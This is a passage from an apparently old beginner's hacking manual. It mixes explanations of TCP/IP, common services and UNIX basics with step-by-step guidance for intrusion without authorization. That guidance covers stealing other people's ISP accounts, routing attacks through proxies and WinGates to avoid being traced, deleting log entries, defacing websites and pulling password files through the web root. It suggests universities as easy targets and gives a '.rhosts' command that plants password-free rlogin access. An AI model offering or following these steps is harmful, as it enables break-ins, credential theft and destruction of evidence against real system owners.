exploits. For more info on what exploits actually are, and how to find and use them, wait
for later sections of this manual.
Keeping from getting caught
Hacking is a gray area, as far as what exactly is legal, and what exactly isn't. Even if you
follow the hacker code of ethics (never harm), you are still quite possibly braking one or
more laws. Let me just say that if you are already on a system, with someone else's login
name and password, you are blatantly breaking a few laws. Nuking is also illegal. IP and
port scanning are not illegal, though they definitely cause suspicion. In the past, measures
to keep oneself safe included hacking from payphones, splicing your neighbors line,
'bouncing' your call (explained later), and even using programs such as Modem Jammer.
Now, you might want to use one or more of these methods to keep from being physically
traced (though modem jammers dont work anymore), and another to keep from being
traced over the Internet (to your ISP). The best and probably easiest way to do this is use
someone else's account, preferably on a different ISP. This is much easier to do that one
might expect. Shouldersurf someone typing in their login/password, do a little social
engineering (explained later), or even brute forcing to get a valid account. There are even
programs out there that if run on a machine used to access the Internet via a dial-up (with
an ISP) it will give you the password. One such example is Dripper (available at The
CyberUnderground). As far as physically tracing you goes, if you are using someone else's
account you are sort of safe. If you have hacked into a system with a low-level account (a
'guest' account, for example) and just got yourself root (see definition above), you should
seriously consider adding a few methods of security before reconnecting. To hack from a
payphone, get an acoustic coupler for your modem, set the receiver on it, and just dial out.
Bouncing your call means basically calling a modem somewhere that is designated as an
'outdial', meaning once connected, any modem commands you issue will go to it, so you
can dial from it somewhere else. If you are traced - it will be to that modem. This can be
defeated though, so its a good idea to bounce calls off a few outdials. Outdials are pretty
hard to find, but are most common on X.25's and other PSN's (for more info on outdials,
read any other hacking text, like "The Neophite's Guide to Hacking," or "The Newbie's
Handbook."
Shell Account Bouncing
Anther security method (similar to bouncing your call) is bouncing your IP attack.
Meaning - telnet to system that supports telnet itself (usually UNIX) - then telnet to your
target. Finding and obtaining access to one of these is difficult for a new hacker, so I'll go
into greater detail on this later.
Wingates
Another effective method to having your IP address logged into the system you're
connected to (and thereby "busted,") is bouncing your packets off a WinGate host.
WinGate is a server software program that acts kind of like a proxy server and firewall all
in one (see above for definitions). As with a generic proxy server, all computers in the
office that the WinGate computer is in connect to it to get to the Internet - and you can do
the same. All you need is the IP address or domain name of a WinGate host. Telnet to it,

and type the IP address you want to get to at the prompt you get. The IP address of the
WinGate box will be logged as you connect - not your own. What's even better is that
Wingate's don't log (keep track of) who connects to them. Unless, of course, the
sysadmin uses some third-party software to monitor network traffic. Finding WinGates is
very easy - just go to any hacker website (www.cyberarmy.com is a good one) and look at
their database of WinGate's. You'll have to weed through lists of bad WinGate's though,
so you may be better off getting a WinGate scanner and doing it yourself. If you're really
smart, you'll bounce your packets off a few WinGate's before getting to your target.
Proxies and Anonymizers
If someone is 'using proxies' to be stealthy, he is simply connecting to web pages (and
possibly FTP, Gopher, etc) through a proxy server. Check the description in 'A Little
Hacker Lingo.' Publicly accessible proxies (or proxies that the owner doesn't realize are
accessible by the world) can be connected to and made proxy all requests. Meaning if you
use proxy1.ozemail.com.au as your proxy server, then surf over to www.yourtarget.com you don't directly connect to yourtarget.com. Instead, you connect to
proxy1.ozemail.com.au, inform it that you want to surf yourtarget.com, and it fetches you
that html file. The proxy's IP address is logged on your target during the connection, since
it was the one who actually connected to it, and not your own.
CGI Anonymizers are nothing more than proxy servers as well. Www.cyberarmy.com has
an anonymizer for you to surf anonymously with. Also, if you use these URLs:
http://proxy-mail/mailcity.lycos.com/bin/redirector.cgi?http://
You can use Mailcitys proxy server to surf anonymously. (These are the proxies used
when you click a link while at Mailcity.) Non-CGI proxies must be entered in your
Internet connection settings (of IE or Netscape).
Filched ISP Accounts
The best way to hide your identity, though, is with a stolen account. Use Dripper or some
other Cache Ripper to get the Dial-Up Networking password from someone you don't
like. Or, sign up for some free ISP service (NetZero, Altavisa Free Access, or WorldSpy)
and give fake account information to get an account that's not attached to you. Make sure
that you're using proxies when you sign up, or they'll know who you are when you sign
up.
Covering Your Tracks
Remember: all computers keep logs of activity. Once you break in, open the logfiles and
delete any entries that involve you (especially ones that logged your IP address). In UNIX
systems, look for logs in /var or /var/adm. In NT, look in \winnt\logs or
\winnt\system32\logfiles or in a directory of a particular service (eg: HTTP or FTP).
Program also exist that will cover your tracks in logs, such as cloak.c for UNIX (available
at TCU).
As a rule of thumb, the amount of security you should be using is directly related to the
seriousness of your hack. Though, you could be breaking many federal and state laws
without even being close to having root access, and not even quite sure what you are
doing. Always be at least a little paranoid: you'll last longer in the h/p world. It cannot be
stressed enough: be as safe as possible.

TCP/IP and the Client/Server model

If by this point you're completely lost, you might want to read some other basic computer
stuph before venturing on here. If not, roll up your sleeves: you're about to learn the very
heart and soul of the Internet and Hacking today.
TCP/IP
Transfer Control Protocol/Internetwork Protocol. The 'language,' or means for which
packets are exchanged over the Internet, or any intranet. TCP/IP is a set of rules and
regulations that specifically define exactly how data is transferred between computers on a
network. TCP is the upper-level protocols (explained shortly) like Telnet and FTP. IP is
the lower-level protocol, used for routing data over a network. Hence the term 'IP
Address.' TCP/IP has several sub-protocols, known as the TCP/IP protocol suite. To
utilize any of these subprotocols, you just need a client of that. For example, Windows 95
and above has a built-in FTP and Telnet client (a client, when referring to a protocol, is a
program that lets a user utilize that protocol). In this section I will explain each of these
subprotocols, and other protocols used over the internet.
Client/Server
One concept that it is imperative you understand is the Client/Server model. Every
protocol is utilized with software. For example: HTTP (Hyper Text Transfer Protocol, the
protocol used to transfer HTML web pages to and from your computer [this is why it is at
the beginning of URL's you visit] ). This protocol is put to use by software. This
software has two pieces, a client side and a server side. When you type in a URL or click
on a link, you are using a HTTP client software program (a browser) to request a copy of
a particular web page. Then, the server of the URL you requested has HTTP server
software, that receives the request (in the form of data packets), and provides you with a
copy of it, by sending it back to your computer. A server side software package is also
called a service or daemon, and is accessed via TCP ports. A port is a "virtual channel"
used to transfer packets of a specific protocol between a client and a server. When you
hear the term 'portscanning,' what is being referred to is the scanning for protocol, or
services. Also, each port (service installed on the server in question) has a number
assigned to it (eg: telnet is generally number 23). At any rate, think of client side software
as the requestor, and the server side software as the provider. Any time you make a
connection with a machine on the web (with Telnet, Internet Explorer, or whatever), your
client is talking to that server via a common protocol.
TCP Subprotocols, and other Protocols
PPP
There are many protocols, most of which discussed here are used over the Internet's highspeed digital lines. However, there are lots of protocols used over regular analog phone
lines, used before the Internet was a major computing tool. These include Kermit,
Xmodem, Ymodem, etc, and all have parallels in the TCP/IP protocol suite. However, the
only "analog phone line" one I'll cover is PPP. PPP (Point to Point Protocol) is the
protocol used to connect to your ISP's server, who intern sends and receives TCP/IP
packets over the internet for you. SLIP is similar, but not as effective or as widely used.
Basically, the way you are able to communicate with the digital network of the Internet is

that your ISP translates TCP/IP packets to PPP (actually encapsulates) so they can travel
over phone lines, and vice versa.
Telnet
Let's start at the basics - on, say, a UNIX platform, there is one or more UNIX boxes - the
computer that does the processing and holds all the data (files, applications, the OS, etc)
which is the computer on the network that you are most likely trying to hack into. Then
there are a slew of dumb terminals directly connected to it. A dumb terminal consists of
nothing more than a monitor and a keyboard - everything a user types/does on a dumb
terminal is handled by the UNIX box. Now, telnet is a protocol/application that allows
people to connect to a computer remotely (over a phone line or the Internet) and process
data locally - meaning when you connect to a UNIX box via telnet, it just as if you were at
a dumb terminal directly connected to the UNIX box. Telnet is the protocol you will be
using to access the computer you are hacking into. You can also telnet to a port other
than 23. Most client / server protocols send data back and forth with various commands
defined in that protocol. You can telnet to a port and issue these commands by hand, and
the daemon will send commands back to you thinking you're a client. For example, when
you type this in on your browser:
http://home.cyberarmy.com/tcu/underground.html
your browser connects to port 80 (HTTP, the port used for transferring of web pages) of
home.cyberarmy.com and sends this command:
GET /tcu/underground.html
in order to view that web page. You can telnet to port 80, issue the same command, and
you'll get the html file sent to your telnet client (just as it would be sent to your HTTP
client, your browser). Kool, eh?
FTP
File Transfer Protocol. This is the protocol used to transfer files between computers over
the Internet. Whether you are downloading password files or uploading changes to their
HTML files, you will do it through FTP. To start an FTP session, you need to log in to the
service with an FTP client, just as you would with Telnet. More on this later.
Incidentally, the later browsers from Netscape and Microsoft have an FTP client built in.
To use it, type 'ftp' instead of 'http' in your browser. FTP has more commands than just to
send and receive. Type 'help' to get help from your client, or 'remotehelp' to ask the server
for what commands it accepts. Also, if you telnet to an FTP port, you can log in, but
without the right client that understands the FTP 'language,' you won't be able to transfer
files.
SMTP
Simple Mail Transfer Protocol. This is the protocol used to send and receive email. If you
connect to a SMTP port (by telnetting into it) you can issue SMTP commands. When you
send an email, along with the actual letter go along its protocol. This means that the
SMTP packets (made up of your letter and other protocol-specific data) connects to port
25, and issues the appropriate commands to the SMTP service in order for the letter to

reach its recipient. You can also connect to this port and issue these commands manually.
The use of this could be sending email and changing the sender address to someone else
(possibly the recipients employer). Also, with the VRFY command, you can find out
whether or not a particular account (login name) exists on the network in question.
Actually, you can telnet to port 25 of a machine and actually send someone email. Just
enter the commands that an email client would - use the HELP command to familiarize
yourself with the various SMTP commands.
HTTP
Hyper Text Transfer Protocol. This, again, is the protocol used to transfer HTML pages
back and forth between two computers. If you see an open port 80 (www), this machine
has a web site. SSL is the encrypted version of this - see the Crypto section above for
more about SSL.
Finger
This protocol (also a UNIX utility) is used to obtain information about users on a remote
machine. With a finger client, you can see who's logged on currently, and can find specific
information about a specific user. Having finger on a UNIX machine is a very bad idea.
Anyone with a finger client (or anyone who wants to telnet into the finger port) can find
out who's logged in, get a list of users for that computer, and get info on specific users. If
your client can't talk to the daemon, telnet in, and hit enter once or twice. Try typing '@'
or 'finger' or something similar to get a response. Then, type in usernames that you find
and hit enter. All this valuable info, without ever logging in - very useful to the hacker. If
ever you find an open finger port, use it. It could just be the point of entry you were
looking for.
DNS
Domain Name Service. If a computer has this port open, it generally means that this
particular computer is a domain server of that network (the spokesperson, if you will).
These computers act as the spokesman for that particular domain. They hold the DNS
table, which translate hostnames into IP addresses, so when you connect to
www.someserver.com, it knows what IP address you're talking about.
NBT
This stands for Net BIOS over TCP/IP, and is what Windows networks use. Another
name for this is 'nbsession,' (Net BIOS Session Service) which generally indicates Net
BIOS used over a Wide Area Network (such as the Internet), being that Net BIOS by
itself (without TCP/IP) cannot be used over a WAN. This protocol is used in conjunction
with ports 135 and 139. The clients for these ports is the Client for Microsoft Networks.
You'll learn how to use it in the NT section.
SNMP
Simple Network Management Protocol. Used to diagnose and manage networks.
Utilities like netstat for UNIX use this lightweight protocol. Certain NT applications of
SNMP are vulnerable - check your local exploit archive for more info.
NCP

Netware Core Protocol. Just that. This isnt a TCP/IP subprotocol. Actually, its usually
used in conjunction with SPX/IPX (Sequential Packet Exchange, Internetwork Packet
Exchange), Novells routable protocol.
Net BIOS
This protocol is a very lightweight one, used for smaller LANs. Its not routable (meaning
by itself, cannot be used to connect networks, or used on the Internet), primarily because
network addresses are nothing more than computer names. Windows networking relies
largely on Net BIOS, but its also used with OSs such as UNIX sometimes.
NetBEUI
Microsofts NetBEUI (Net BIOS Extended User Interface) is what youre using when you
browse your network neighborhood. NetBEUI uses UNCs (Uniform Name Convention)
to locate resources. A UNC looks like: \\computername\sharename\path. With this format
- you can access any data on your NetBEUI (or TCP/IP - if its a Windows network)
network. More on this later.
UDP
UDP - Uniform Datagram Protocol. This protocol is actually used in place of TCP for
some applications. TFTP, for example, uses UDP. So does SNMP. UDP encompasses
many subprotocols, just like TCP does - so its not actually a TCP subprotocol either.
Some network utilities youll use will actually use UDP (UDP over IP, as opposed to TCP
over IP), but the difference is transparent. Get yourself a networking book for more on
these kinds of things.
POP3 and IMAP
These are used for email. POP3 (Post Office Protocol version 3)stores and retrieves mail
on a server. IMAP requests them - in some cases. For example: when you use Outlook
Express to download your email, youre getting it from a server with POP3 on it. If you
use a web-based email provider such as Hotmail or Mailcity, you view and manipulate it
with IMAP.
SSH and SSL
SSH (Secure Shell) is basically just encrypted telnet sessions. SSL (Secure Socket Layer)
is encrypted HTTP. To use SSL with IE or Netscape, type https:// instead of http://.
AppleTalk and AppleShare
These are not TCP subprotocols. They are used by Mac networks, but can be
implemented over IP (to connect to the Net). The Miscellaneous OSs section goes over
this a little.
These, along with many other protocols are used regularly over the internet as well. It is
not in the scope of this text to explain them all, so I encourage you to research them and
the others I've covered in more detail.
I could cover pages and pages of TCP/IP stuph. As you gain a bit of experience in this
craft, you will need to learn more about this. For now, just understand that when you do
anything on the Net, whatever program you're using sends packets in the appropriate
command form (TCP/IP commands) across the cable connections that make up the

Internet. And of course, TCP/IP conforms to the OSI model - the backbone of every
network protocol, the way everything communicates digitally. Go out and read about OSI
- you'll appreciate it later.
Getting Started - Your first night as a Newbie
Okay - you've found the network/system that you want to hack. What's first? Find out
which of these protocols the target supports. Can you telnet to this computer? Can you
FTP to it and copy files from it? To find out, you will need to run a portscan on it, with
you portscanning utility. Just type in the URL or IP address of the machine in question,
and start scanning. You will be shown what protocols (TCP/IP subprotocols and others)
the target has. It will not, however, tell you that it supports TCP/IP, because, to put it
simply, it has to have TCP/IP to be on the Internet. What you are looking for here is
services - these TCP/IP subprotocols and other services/ports. Do not let the term port
mislead you - we're not talking about physical ports. If you don't understand this first
step, reread the TCP/IP section.
Now, if the portscan indicated that the target machine supports telnet (port 23), you can
telnet to it, and attempt to log in. Go ahead - try it. You'll need a valid
username/password combo to get it, which we'll get to later.
If port 21 is open, that means that the machine supports FTP, and files can be transferred
back and forth from it. But, like access via telnet, you'll need a login name and password.
A default "anonymous" account is ftp/ftp for a username/password, so go ahead and try
that. If this works (and don't be surprised if it doesn't), you won't have much in the way of
access privileges (meaning you'll be able to look at files, but usually not copy files to your
computer, and most likely not copy files to it). If you can anonymously log on, you at
least have your foot in the door, and can possibly use this as a stair stepping to get further
into the system. More on this later. Once logged on via an FTP port, commands to jump
around from directory to directory and copy files is very DOS-like (actually more UNIXlike than DOS, but if you know a little DOS, you should feel comfortable navigating the
system). Type 'help' or '?' for a list of commands. When you do this, you are accessing a
help file on your computer. To access the help file on the computer your on (which is
usually more extensive and has commands specific to the computer your logged on to)
type 'rhelp' or 'remotehelp,' or something similar. Or you could telnet to the FTP port and
type 'help.' FTP is the only way to transfer files between the target computer and yours which you will need to do to get password files, change their website ('this site has been
hacked by Kurruppt2k'), upload exploits, or whatever. More on this later. One last note
on FTP - you can telnet to an FTP port, and log in. However, since you are not using an
FTP client, you will not be able to do much once inside (like get directory listings or
download files) because your telnet program does not follow the rules and guidelines
(protocol) specified in FTP. Again, you can telnet to any port, but if the right commands
are not issued (usually done by your client program), you may not get anywhere, and may
even be disconnected. Telnetting to ports that you aren't sure what are, though, is a very
good way to learn about the computer you are targeting, and is usually necessary to break
in.
Now, if your portscan turned up either 'www' or 'http,' that means that you've found the
computer that has all the HTML files (website files) that contain this organizations
website. This really is only relevant if you are attempting to break into the target's
website. To do so, you'll need access to the index.html or default.htm file (usually only
accessible to superusers, or root accounts), and will have to FTP the page you will replace

theirs with, and replace index.html with your own. Doing this, though, could be
considered cracker-like, and slightly malicious. This also tends to piss sysadmins off, and
may drive them to attempting to find you - so be careful!
A last few notes on TCP/IP. You need to understand the structure of a URL, and of an IP
address. Every computer on the Internet is designated by an address. The addressing
scheme (IPv4) looks something like this: 38.233.203.2. Generally, the very last number is
the node address, or the computer's address. The rest is usually considered the network
address (depending on the Class - read a document on IP addressing for more info). Each
number between the decimals (called an octet) can be from 1 to 254. So the IP address is
in the 38.233.203 subnet. The last number, again, specifies the computer in that subnet.
So if you wanted to see what other machines were on that subnet, you would scan from
38.233.203.0 to 38.233.203.254. Now, each IP address can also have a name. If
38.233.203.2 belongs to the netscape.com domain, it might be www.netscape.com, or
mail.netscape.com, or something similar. So when you type www.netscape.com to visit its
website, you could also type http://38.233.203.2 (assuming that was its IP address).
Which brings us to the URL. Here is a typical "web address":
http://www.microsoft.com/servives/windowsNT. The http:// specifies the protocol used.
You could also replace it with ftp:// or even telnet://. (Note: to log in via ftp with your
browser, use ftp://username:password@www.yourtarget.com.) The www.microsoft.com
is just the computer name. The DNS protocol handles resolving the name into an IP
address. The /services/windowsNT is the path to the file you are requesting (index.html or
default.htm, if none other is specified), just like a path on your computer (with foreword
slashed instead of backslashes).
Webservers usually have what's called a wwwroot directory. This is the root of the
browsable machine. Meaning the path on the machine itself:
/texts/wwwroot/images/source.gif
of the computer www.gateway.com is:
http://www.gateway.com/images/source.gif
This is important. The root to you, the browser of a webserver, isn't the actual root of the
system's hierarchy. Why? So people browsing can't access the entire machine - just the
web pages and stuff that the webmaster wants you to see. So lets say you cracked a
UNIX machine with a non-root account, and wanted to download the password file of the
Gateway computer above. The file is (in this case) /etc/passwd. To download it, you'd
copy it to /texts/wwwroot. So its actual path is /texts/wwwroot/passwd. But its URL (to
anyone browsing the server) would be www.gateway.com/passwd. So you'd just type that
into your browser to download the password file, and you're off to cracking it. Of course,
doing this without proxies or a stolen ISP account will get you traced and busted right
away.
You're First Hack
Okay, you now should have enough preliminary knowledge to start your very first hack.
Pick a target. Universities usually have somewhat lax security. Pick something relatively
easy for your first time. Stay away from government networks and those belonging to

large businesses and corporations. The very first step is finding the domain name of your
target. If your target is www.spicegirls.com, the domain name is simply spicegirls.com.
Step one - Intelligence Gathering
Every successful hack starts with a little preliminary investigation. The more information
you have about a specific domain, the better armed you are. Open a notebook and start an
"info collection" of your target. First, visit their website. Try to view every page, and
write down anything of importance. Copy down all email addresses - as these are also
usually valid login names. Write down anything else of relevance. Look at the source
HTML and see if there are links to other computers you didn't know about. Next run a
whois and nslookup on the domain, with your appropriate utility (available at The
CyberUnderground). This will give you very useful information. You'll get the domains
nameservers, the administrator, and a few more email addresses, other computers on the
network, and other useful stuff. Copy everything down. Another trick is sending an email
to the domain with a username that you know doesn't exist (eg:
blablabla@yourtarget.com). The SMTP service of whatever server is designated as the
primary mail server of that network will return a letter to you saying that there is no such
user. In the header of this email will also be some useful information - copy it all down.
Step two - Network Scanning
Next you should try to get a scope of what kinds of computers are on the outside of this
network (by outside, I mean what machines are "on the Internet," and not behind a firewall
or proxy server). To do so, you will scan the subnet with your trusty IP scanner. Again, a
subnet is every computer (numbers 1 through 254) on a particular range of IP addresses.
For example, 253.87.8.3 and 253.87.8.45 would be on the same subnet, whereas
253.87.8.45 and 253.87.11.12 are not. (Actually, class C subnets are often-times broken
up even further - read an RFC on IP to learn all about IP addressing, packet structure,
etc.) To scan the subnet of your target, do as follows. Ping the hostname (your computer
should have a ping utility, as do most of the hacker programs you should already have).
This will give you the IP address. If the IP address is 253.87.8.45, scan the entire subnet,
which would be 253.87.8.1 through 253.87.8.254. This will tell you every computer on
that subnet - their IP addresss and hostnames if applicable. If you already know of two
computers on different subnets, scan both. Now, write down each computer you found
and their IP addresses, along with any relevant notes. When you're done, you should have
a list of each (or most) of the servers on your target's network, not behind a firewall/proxy
server, and accessible to you.
Step Three - Point-of-Entry Determination
Now that you know what servers are on this network, you need to find out what kinds of
computers they are: what OS's they are, and what services are running on each. So what
do you do next? You guessed it - you'll scan for services, or ports, on each computer you
found. Use your portscanner and scan each computer you wrote down. Think of each
service running on a machine is like a door that you might be able to break in through.
Below I'll explain methods to use to possibly "break and enter" through each "door."
Now, to get in, and have the power to actually do things and explore the network, you'll
need to telnet or NetBEUI into one of the machines. This is usually the last step of
hacking your way in, and you'll need a username and password to do so (or an exploit,
which will be explained shortly). You'll hack into other ports in order to get these

usernames and passwords. Now, a username and password that works on one machine of
the network will usually work on all on that same network, so if you get passwords from
one computer, you can use them on a different one to get in. Also, if there are no telnet
ports, you can still (sometimes) log in via FTP. You won't be able to do much (like run
any programs on the computer), but you will be able to look around and upload or
download files from the computer. What steps to take here entirely depend on the
Operating System of your target. Some networks you'll find will have a variety of OS's,
some will have just one. Here is a list of ways to fingerprint computers - find out what
their OS is.
Server Fingerprinting

If port 23 is open, its probably UNIX. Telnet to it to find what flavor (BSD,
Solaris, etc). It is important!
If port 135 or 139 is open its probably NT. At a DOS command prompt, type:
c:\nbtstat -A [ip address]
If you get a response other than 'host not found,' it's definitely NT (or possibly
Windows 9X).
More on what this nbtstat stuff means in the NT section.
If none of the other ports are open, try telnetting (or FTP-ing) into port 23, and
give the command:
ftp>SYST
Without the prompt (just 'syst'). This might tell you the OS of the machine, or at
least if it's UNIX
or NT. Sometimes you have to log in before giving this command, sometimes not.
If port 80 is open you can telnet in and issue this command:
GET / HTTP/1.0
To find out the webserver running. You'll probably want to turn on your telnet
logging, because
the info will fly by your screen really fast. If the webserver is IIS - the machine is
NT. If the
webserver is Apache - the machine is UNIX (probably Linux). Otherwise,
look up whatever
webserver is running to find out what OS its for.
If ports 21, 23, 80, 135, and 139 are all closed, there's no easy way to find the
OS. But then, without at least one of these ports being open, you probably won't
be able to hack in either (these ports are the primary means you'll get in) so pick a
different computer to try and break into.
The Kinds of OS's you'll run into are pretty much just NT Server (along with an occasional
NT Workstation and Windows 9X box), and UNIX. At least once in a while, though,
you'll run into a Netware box, and even a mainframe wired to your target's network. That
means to become elite, you'll have to learn a handful of operating systems.
UNIX
UNIX machines are the backbone of the internet. The OS and TCP/IP were crafted pretty
much simultaneously, with each other in mind (where else can you send an entire email in
one command?). For example, Internet email addresses are username@computer.com
because inter-UNIX messaging was in that form. The vast majority of the computers

you'll come across on the Internet will be some flavor of UNIX, be it BSD, Solaris, AIX,
Linux, or whatever. UNIX systems are set up to be multiuser. There will be a UNIX box
with lots of dumb terminals (monitors and keyboards with no boxes of their own) directly
hardwired into it. Each person who is authorized to be on a dumb terminal (or access the
box via telnet) has an account on that system, and probably on each machine on that
subnet. Their account has their own directory (folder), which is the same as their
username. As soon as they log in, they will be placed in that directory, or their home
directory. Every file and directory in a user's home directory belongs to that user, be it a
text file, program, or whatever. Also, every user belongs to a group. This is important,
because it is a fundamental of how permissions work.
Not every user is allowed to read every file on the computer, change every file, and run
every program. To list the files in your pwd (present working directory, the "folder" your
currently in) type 'ls' (without the quotations). This is equivalent to the 'dir' command in
DOS. Type 'ls -a' to see all files, including hidden ones (files that start with a period). To
see the permissions of the files in your pwd, type 'ls -l'. This will tell you the permissions
of that file, including who owns it, and what group that user belongs to. Permission
categories are set for read permissions (the ability to read the file), write (the ability to
make changes to the file), and execute (the ability to run the program). Each category is
set for the owner of that file (user), everyone in that user's group (group), and then for
everyone else on the system (other). When you issue an ls -l for each file will be listed a
ten character string. The first character will be a dash (-) if its a regular file, a 'd' if its a
directory, or an 'l' if its a symbolic link (kinda like a windows shortcut). Other less
common letters may appear, which I won't cover. The next nine characters are broken up
to three sets of three. The first three apply to 'user,' or the owner of that file. Each of the
three characters represent either an r for read, a w for write, or an x for execute. If they
have permissions to read, write, or execute that file, the corresponding letter will appear, if
not, a dash will. The next set of three characters apply to the file owner's group, with r, w,
and x in the same manner. And the last set of three are for 'other,' meaning the permissions
(r, w, and x) for everyone else on that system. So a permissions string of -rwxr--r-- means
that its a regular file (not a directory or link), that the owner of that file can read it, make
changes to it, and execute it. Also, we see that the group that the user belongs to can also
read the file (but not change or execute it), and that everyone else can read it but nothing
else.
UNIX is set up much like DOS, in that there are directories with subdirectories, and a root
directory. Instead of C:\tools\ftp you would see /tools/ftp. The slashes are foreword
instead of back, and there is no drive letter - root is simply:
/
Another similarity between UNIX and DOS is the idea of writing a file containing a list of
commands to be ran in order. If you're familiar with DOS batch files (.bat or .cmd for
NT), UNIX shell scripts work the same way. Use vi or some other editor to write
commands one line at a time. To execute them, use chmod to make them executable, or
type:
sh shellscript

where sh is the shell you want to execute the script, and shellscript is the script itself.
Oftentimes, if you find a UNIX machine on the Internet, it is connected to a variety of
other computers. What's more exciting is that the UNIX machine you just broke into may
be directly connected to another, more secret UNIX computer that was behind a firewall
(meaning that you normally wouldn't be able to just telnet to it from your home computer,
and it probably didn't show up on a subnet scan). If you telnet from your hacked UNIX
account, to another UNIX machine, your source IP address becomes that of the UNIX
machine you are on (this is often done to deter authorities from tracing a hack). So lets
pretend you run a subnet scan on your target network, looking for a computer called
secret.network.com. Among others, you find comp1.network.com, comp2.network.com,
and comp3.network.com. But no computer named secret. And if you try to telnet to
secret.network.com, you're connection lasts only a split second. Firewall. After a few
hours of plugging away gets you a rootshell on comp2. You then telnet from comp2 to
secret, and are presented with a logon prompt. Why can you now connect to secret?
Because your IP address is now comp2's, meaning secret is set up to allow connections
from computers only on its network - and it thinks you are comp2. For a list of connected
UNIX machines, look at /etc/hosts.
When you first log into a machine with a username and password you 'hacked,' find out
what group that account belongs to, and get a feel for what kinds of stuff you have access
to, and what you don't. If you find yourself with just about zero access to anything fun,
you'll have to use the account you have to obtain one with more privileges. Here are a
few ways to do that.
UNIX Stair-stepping
Get the unshadowed password file. More on this in the 'Unbeleivable...A
Hacker!' section.
Find a vulnerable program to exploit (such as a buffer overflow - more on this in
'Unbeleivable...A Hacker!').
Install a keylogger or network sniffer.
If the only password file you can get is shadowed, use it and the finger command
to get a list of usernames, and Brute Force the system.
In order to better hack a UNIX system, you'll need to know your way around one. Here
is a basic list of directories in UNIX, and what you might find in them.
/
The root directory.
/dev Device files (in UNIX, every physical device is represented by a file, like
hda for the first
hard drive, and tty for terminals).
/etc
The system Directory - all kinds of stuph, including the password file
(usually).
/usr
Usually holds user's home directories.
/u
Also can hold user home directories.
/lib
Holds library files - .h files which are like DLL's for C programs.
/var Holds system logs - go here to clean up your tracks.
/pub The public directory.

/root
/bin

Root (the superuser) home directory

Binaries - compiled programs like sh, telnet, and most commands

Of course, you'll find many more directories and subdirectories than this. This will just
give you an idea on how to navigate a UNIX environment. Also, Appendix B has a list of
UNIX commands.
It's important to know that different commands work differently under different shells.
Yes, UNIX has multiple shells. If you're used to DOS, this may be a bit confusing at
times. As I said the description of 'shell' in the 'A Little Hacker Lingo' section, a shell is an
interface to an OS. The kernel of any OS is the heart of it - the brain. The shell is the
interface to it - the program between you and the kernel. The shell accepts commands
(either command-line or GUI commands, like double-clicking something) and interprets
the commands into something the kernel can understand and execute. UNIX is a very
versatile OS, and has multiple shells for multiple ways of interfacing the system.
/bin/sh
The Bourne Shell - the first (and most basic) UNIX shell.
/bin/bash
The Bourne Again Shell - good for beginners.
/bin/csh
The C Shell - csh commands are similar to the C
programming language.
/bin/zsh
The Z Shell - more programmer friendly.
/bin/tcsh
The TC Shell - similar to the C Shell.
/bin/ksh
The Korn Shell - similar to the Z shell.
There are a few more, but these are the most common. To find out what shell you're
using, type the command:
echo $SHELL
(Note: the $ indicates an environment variable, which work similarly to environment
variables in DOS only a variable looks like $var instead of %var%). Also, redirectors and
pipes work the same for most shells. Here's a quick explanation on special characters for
UNIX:
>
your monitor.
<
|
&
back.
!

Redirector - sends output of a command to a text file instead of stdout Redirector - inputs data from a text file instead of stdin - your keyboard.
Pipe - the output of one command is sent as input to another.
Ampersand - sends a process to the background and gives you a prompt
Exclamation - sends commands to the parent process / shell.

For more info on UNIX, get a UNIX book, or read the UNIX Bible text file (available at
The CyberUnderground). This is one operating system that you will need to know, and
well, if you plan on becoming leet.
Hacking UNIX
To break into a UNIX box requires a few things. First, you need to know what flavor it is.
These include Linux, NetBSD, FreeBSD, OpenBSD, System V, SunOS, Solaris, AIX,

Digital UNIX, HP-UX, SCO Unixware, IRIX, and a few others. Of each of those are
various different version numbers as well. If the login prompt won't tell you, an FTP
SYST may, otherwise you'll have to get in to find out.
Follow steps one, two, and three in the 'Getting Started - Your First Night as a Newbie'
section. Find out what ports are open, and what daemons are bound to these ports. Get a
list of usernames through the website (if one exists), through finger, etc. Then, spend a bit
of time brute forcing (explained more thoroughly later) each one of these. Then try the list
of commonly used UNIX logins/passwords in Appendix A. Oftentimes this wont' work but its easy so give it a shot.
Next look for vulnerabilities. Open up your CGI Vulnerability Scanner (or go to
infinityzone.cjb.net and use theirs) and scan for vulnerabilities. If the scanner finds one,
you'll want to learn how to exploit it. The 'System Exploit' section of this text lists a few.
Some scanners explain how to exploit them (or even do it for you), but you'll usually have
to look it up. Go to www.rootshell.com, www.securityfocus.com, www.anticode.com,
www.bugtraq.com, or any other exploit site and look up the vulnerability you found for
specific ways to get in. If you can't find any CGI vulnerabilities, look for service
vulnerabilities. Specifically, find out what programs (and version numbers) are running on
ports 21, 25 and 80. Certain versions of wu-ftp (an FTP server) are vulnerable, as are
versions of sendmail (an HTTP daemon). Search all the exploit archives for every daemon
on every port of your target. You'll usually find at least one vulnerable service on a
network.
Get that exploit to run. Most are in C code, so you'll have to compile it on a UNIX
machine - either your own or another shell account. One issue here is that all flavors of
UNIX interpret different C scripts differently, as do different shells. Compiling code
sometimes involves a bit of tweaking and playing with cc and gcc. For that reason, you'll
be much better at UNIX hacking if you learn C. Using exploits will be explained in more
detail later.
TFTP. The Trivial File Transfer Protocol is similar to its cousin, but much less secure.
TFTP listens on port 69, so if you see that open, you may be in luck. TFTP accounts are
commonly unpassworded, also. Not to mention that they dont use encryption during
authentication, so sniffing segments on these boxes will often provide results. Another
huge insecurity with TFTP is that most installations dont restrict access with a virtual root
directory. Meaning even logged in as guest you can venture all the way to /, including
/etc. TFTP is necessary to autoconfigure Cisco routers, so if you see a Cisco machine on
the network, scan its subnets for open ports 69.
Rhosts. In a nutshell, if any user has a .rhosts file in his home directory, he can execute
commands from another computer. The /etc/hosts file is the .rhosts equivalent for the
entire system, but usually blocked from most users. If your victim has a .rhosts file in
the /home/john home directory that allows connections from your UNIX box, you can use
the rlogin command to log in (like telnet) without a password. The .rhosts file and
/etc/hosts file describes what systems can utilize the R services, and what users. The plus
sign (+) is a wildcard, meaning any host, or any user. So pretend you crack the guest
account of a Sun box. You want root, but cant run any programs to exploit the machine.
But you notice user jsmith can. And jsmith left his directory unprotected (-rwxrwxrwx on
all his files). What do you do? This:

Echo + + > .rhosts

This will put + + into his .rhosts file, allowing you to rlogin into his account. Well go
into a bit more depth of the R services and how to abuse them in the Elite Hacker Tactics
section. >:-)
NIS and RPC. RPC (Remote Procedure Call) was developed by Sun Microsystems to
allow running applications to seamlessly interact with apps on another UNIX box. And
